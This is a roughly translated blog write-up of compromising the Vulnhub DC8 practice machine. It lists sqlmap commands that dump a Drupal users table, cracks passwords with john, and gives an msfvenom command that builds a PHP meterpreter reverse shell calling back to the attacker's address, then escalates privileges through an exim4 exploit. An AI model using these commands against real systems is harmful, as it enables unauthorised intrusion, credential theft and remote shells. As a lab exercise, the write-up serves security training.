当前位置:网站首页>Vulnhub's DC8
Vulnhub's DC8
2022-06-26 21:54:00 【Tianxia (Tianyan Master)】
Dear friends , But look at the master directly
https://blog.csdn.net/weixin_44288604/article/details/122944302
Personal writing is very rough
DC8 Its own difficulty is low , You can easily obtain the target permission , General idea
The host found , Port scanning —— Exploit service vulnerabilities —— Get background permissions —— Upload shell—— Raise the right
The host found , Port scanning , Service detection 

Total open 2 Ports ,80 and 22 port ,80 The services with open ports are drupal 7, Open the interface for detection , Here use burpsuit union xray To test
burpsuit Of user option Set your own idle agent in the operation bar , function xray that will do , As shown in the figure below
Use here bp Test with your own browser , Then click on the interface , Click on each function node
Click to http://192.168.43.142/?nid=3 In this interface ,xray The presence of sql Inject , Go straight up sqlmap
Two databases were found ,d7db,information_schema, Choose the first one here d7db, View table name
sqlmap -u http://192.168.43.142/?nid=3 --batch -level 4 -D d7db --tables
Choose from a variety of tables users surface , Direct download
sqlmap -u http://192.168.43.142/?nid=3 --batch -level 4 -D d7db -T users --dump
Two users were found ,admin and john, But the password is the encrypted data , Try brute force cracking , Make these two ciphertexts into a dictionary , Use john To crack violently , Burst out of it john The password for turtle, Log in backstage , View to upload shell The location of , It is recommended to use Google browser , Don't ask , Ask is to be able to right-click translation 
In this interface , You can define the interface after entering the form , Here the msf Generate php The Trojan horse bounced , It has been generated , No display
msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.43.128 LPORT=8888 -f raw > shell.php
Open the file , Copy the file to the location shown above , choice PHP code, And save , Then submit the data in recheck format in the corresponding form , You can accept the session
python Interactive shell, Find yes sudo Permission to execute the file
find / -perm -u=s -type f 2>/dev/null
found exim4 by sudo jurisdiction , View version , Find corresponding exp
exp Dafa , Download the second one here , Then copy it to the attacker , Use python Turn on http service , The target machine downloads and runs

get root jurisdiction
边栏推荐
- Android mediacodec hard coded H264 file (four), ByteDance Android interview
- Comprehensive evaluation of online collaboration documents: note, flowus, WOLAI, Feishu, YuQue, Microsoft office, Google Docs, Jinshan docs, Tencent docs, graphite docs, Dropbox paper, nutcloud docs,
- VB.net类库(进阶——2 重载)
- 中金证券经理给的开户二维码办理股票开户安全吗?我想开个户
- Introduction to operator
- vulnhub之DC9
- About appium trample pit: encountered internal error running command: error: cannot verify the signature of (solved)
- What are the accounting elements
- 尚硅谷DolphinScheduler视频教程发布
- PostgreSQL notes
猜你喜欢

网络爬虫2:抓取网易云音乐评论用户ID及主页地址
![leetcode:152. Product maximum subarray [consider DP of two dimensions]](/img/c8/af6a4c969affd151a5214723dffb57.png)
leetcode:152. Product maximum subarray [consider DP of two dimensions]

Hands on deep learning pytorch version 3 - Data Preprocessing
![leetcode:1567. 乘积为正数的最长子数组长度【dp[i]表示以i结尾的最大长度】](/img/a4/c5c31de7a0a3b34a188bfec0b5d184.png)
leetcode:1567. 乘积为正数的最长子数组长度【dp[i]表示以i结尾的最大长度】

Sword finger offer 12 Path in matrix

Godson China Science and technology innovation board is listed: the market value is 35.7 billion yuan, becoming the first share of domestic CPU

茂莱光学科创板上市:拟募资4亿 范一与范浩兄弟为实控人

Leetcode(452)——用最少数量的箭引爆气球

How to analyze financial expenses

Yolov6: un cadre de détection de cibles rapide et précis est Open Source
随机推荐
vulnhub之dc8
The latest 2022 research review of "continuous learning, CL"
线性模型LN、单神经网络SNN、深度神经网络DNN与CNN测试对比
Application and Optimization Practice of 100 million level monthly live national karaoke feed service in Tencent cloud mongodb
fastadmin极光推送发送消息的时候registration_id多个用逗号分割后无效
Listing of maolaiguang discipline on the Innovation Board: it is planned to raise 400million yuan. Fanyi and fanhao brothers are the actual controllers
如何用 SAP BTP 平台上的图形建模器创建一个 OData 服务
Is there any risk in opening a new bond registration account? Is it safe?
YuMinHong: New Oriental does not have a reversal of falling and turning over, destroying and rising again
The network connection is disconnected. Please refresh and try again
Which securities company is the most convenient, safe and reliable for opening an account
[LeetCode]-链表-2
Usage of MGrid in numpy
Can compass open an account for stock trading? Is it safe?
Matrix derivation and its chain rule
在Flutter中解析复杂的JSON
亿级月活全民K歌Feed业务在腾讯云MongoDB中的应用及优化实践
Vi/vim editor
Is there any risk in registering and opening an account for stock speculation? Is it safe?
Fastadmin Aurora push send message registration_ Multiple IDs are invalid after being separated by commas